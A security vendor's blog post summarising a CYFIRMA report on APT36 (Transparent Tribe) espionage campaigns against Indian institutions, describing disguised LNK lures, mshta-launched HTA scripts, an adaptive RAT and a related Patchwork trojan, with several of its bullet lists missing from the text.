If you thought some cyber espionage groups had disappeared, this case proves the opposite. Transparent Tribe, also known as APT36, has resurfaced with a new wave of targeted attacks against government agencies, universities, and strategic entities in India. This time, the group is using increasingly sophisticated techniques designed to remain stealthy and persist inside compromised systems for long periods.
At TecnetOne, we closely track these operations because they often anticipate trends that eventually spread to other countries and sectors.
Transparent Tribe is not a new actor. It is an Advanced Persistent Threat (APT) group that has been active since at least 2013, specializing in cyber espionage campaigns. Historically, its primary focus has been India, targeting government, academic, and strategic institutions.
Unlike more high-profile groups, APT36 has maintained a relatively low profile, but with consistent and highly targeted activity. Its mission is not quick financial fraud or noisy ransomware attacks, but rather the silent collection of sensitive intelligence.
The most recent campaign, analyzed by cybersecurity firm CYFIRMA, begins with a technique that remains surprisingly effective: spear phishing.
Victims receive an email that appears legitimate and is tailored specifically to them or their organization. The message includes a ZIP file containing what looks like an official PDF document—but it isn’t.
The file is actually a Windows shortcut (LNK) disguised as a real PDF. It even displays the full content of the document when opened, avoiding suspicion.
Opening the file does not launch a standard PDF viewer. Instead, the system silently executes an HTA (HTML Application) script using mshta.exe, a legitimate Windows tool frequently abused by attackers because it often evades security controls.
This script:
While you read the document, the attacker is already inside your system.
Learn more: Cyberespionage Against Executives and Politicians
One of the most disturbing aspects of this campaign is the malware’s adaptive behavior. The RAT adjusts its persistence mechanisms based on the antivirus software detected on the infected system.
For example:
This demonstrates a high level of development and deep knowledge of the Windows ecosystem.
The main malicious file, identified as iinneldc.dll, functions as a fully capable RAT. Once active, attackers can:
In short, the system is no longer under the user’s control.
According to CYFIRMA, APT36 remains a highly persistent and strategic threat, with a clear focus on:
The objective is not disruption, but long-term intelligence gathering, which is particularly concerning when universities and research institutions are involved.
This is not the only recent operation attributed to Transparent Tribe. In previous weeks, researchers identified another campaign using an LNK file disguised as an official government notice, allegedly related to WhatsApp.
The lure was especially clever: a legitimate security advisory issued by Pakistan’s CERT regarding a fraud campaign. In other words, attackers weaponized a real security warning to infect systems.
Once deployed, the malware connects to a carefully designed command-and-control (C2) infrastructure, using:
Even if some C2 servers are currently inactive, the persistence mechanisms ensure that access can be reactivated at any time.
Similar titles: LunaSpy: The Fake Antivirus Spying on Your Phone
The report also links recent activity from Patchwork (another APT group believed to be of Indian origin) to a new trojan called StreamSpy.
This malware combines:
The trend is clear: APT groups are modernizing their toolkits, sharing resources, and refining evasion techniques.
Even though these attacks target India, the techniques used are universal. At TecnetOne, we highlight several critical lessons:
Transparent Tribe proves that cyber espionage is not only alive, but constantly evolving. Groups like APT36 operate with patience, precision, and clearly defined objectives.
If this case makes anything clear, it’s that the most dangerous threats don’t always come with visible ransomware or extortion messages. Sometimes, the greatest risk is the attacker who enters quietly—and stays.
At TecnetOne, we believe that understanding these campaigns isn’t just about staying informed—it’s about anticipating what comes next. Because in cybersecurity, the adversary attacking others today may be targeting you tomorrow.